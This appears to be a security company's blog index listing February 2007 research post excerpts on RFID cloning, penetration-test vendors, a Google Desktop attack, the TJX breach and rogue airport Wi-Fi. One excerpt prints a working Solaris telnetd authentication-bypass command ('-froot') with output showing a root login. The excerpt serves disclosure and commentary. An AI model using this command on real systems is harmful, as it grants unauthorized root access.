Posted by Chris Wysopal in RESEARCH, February 27, 2007
RFID security device manufacturer HID is using threats of patent infringement to stifle a Black Hat Federal presentation by Chris Paget on the threat of RFID card cloning. The risks of RFID card cloning are real and are nothing new. The details of the technology have been publicly available for years. What is new is the visceral demonstration that a device can provide. HID is scared that people will stop purchasing their technology once it is widely known that it is not secure. This shows the power of security researchers to get …
Posted by Chris Eng in RESEARCH, February 27, 2007
An article was forwarded to me today, entitled Avoid Wasting Money on Penetration Testing. While the core message is on target (i.e. be sure you know what you are getting before you sign on the dotted line), the suggestions for how to achieve this are misleading. Let’s examine the “5 steps to choosing a supplier” outlined in the article:
Ask if their consultants have passed an independent penetration testing assessment. There are some services that will independently test a consultant and rate their strengths and weaknesses in great detail.
You are going to weed out a lot of top-notch …
Posted by Chris Eng in RESEARCH, February 23, 2007
Watchfire just released a whitepaper on Overtaking Google Desktop which is a thought-provoking read. It essentially exploits the mechanism by which Google Desktop hooks the browser in order to inject links to the local Google Desktop instance when the user performs a typical online Google search. There are a couple of gating factors to making this attack viable — the initial attack vector requires an exploitable XSS vulnerability in google.com, and the victim must have Google Desktop’s browser integration feature enabled. An added twist is that a successful attack essentially gets cached by Google Desktop (since …
Posted by Chris Wysopal in RESEARCH, February 23, 2007
TJX issued a press release yesterday coming clean on what they know about the breach of their corporate network. They are now admitting that they have been compromised as early as July 2005 and continued to be compromised up until December 2006. It is unlikely only one attacker found the vulnerabilities exploited. I wouldn’t be surprised if dozens of attackers found their way into the network during that time.
One of the pieces of data stolen was driver license numbers given by customers when returning merchandise to “T.J. Maxx, Marshalls, and HomeGoods stores in the U.S. and …
Posted by Chris Eng in RESEARCH, February 12, 2007
An annoyingly stupid vulnerability in the stock Solaris 10/11 telnet daemon, courtesy of Full Disclosure (more details in this PDF, but it’s NSFW): Pass “-f[user]” as the “-l” option to telnet, and presto, you bypass the entire authentication process and are logged in as the user of your choice! Works for the root user too, as long as the server is configured to allow remote root logins.
ceng@localhost [~]$ telnet a.b.c.d -l "-froot"
Trying a.b.c.d...
Connected to a.b.c.d.
Escape character is '^]'.
Last login: Thu Feb 1 02:28:29 from w.x.y.z
JESv4 Message of The Day (MOTD)
Welcome to the Sun Java Enterprise System …
Posted by Chris Eng in RESEARCH, February 4, 2007
Like many of the people who will eventually read this, I’m packing my bags and heading to San Francisco tonight for the RSA Conference. For those of you also attending, please stop by our booth (#2612) and say hello. We’ll be giving demos of our service platform and discussing how our software-as-a-service delivery model will help solve application security problems that tool-based approaches can’t begin to address.
If you have a full conference pass, be sure to catch Chris Wysopal’s panel discussion, “Vulnerability Reporting and Full Disclosure: The Naked Truth”, on Wednesday at 10:30 AM in Burgundy …
Posted by Chris Eng in RESEARCH, February 3, 2007
A few weeks ago I was waiting for a flight in the JetBlue terminal of JFK. JetBlue offers free Wi-Fi to its customers, which is a nice touch. I powered up my laptop and this is what I saw:

If I’m your typical non-security-minded traveler, which of these networks am I most likely to connect to? I would guess that the majority of people will select one of the two with Jet Blue in the SSID, or maybe the one called Free Public Wi-Fi. Interestingly enough, the real JetBlue SSID is the one …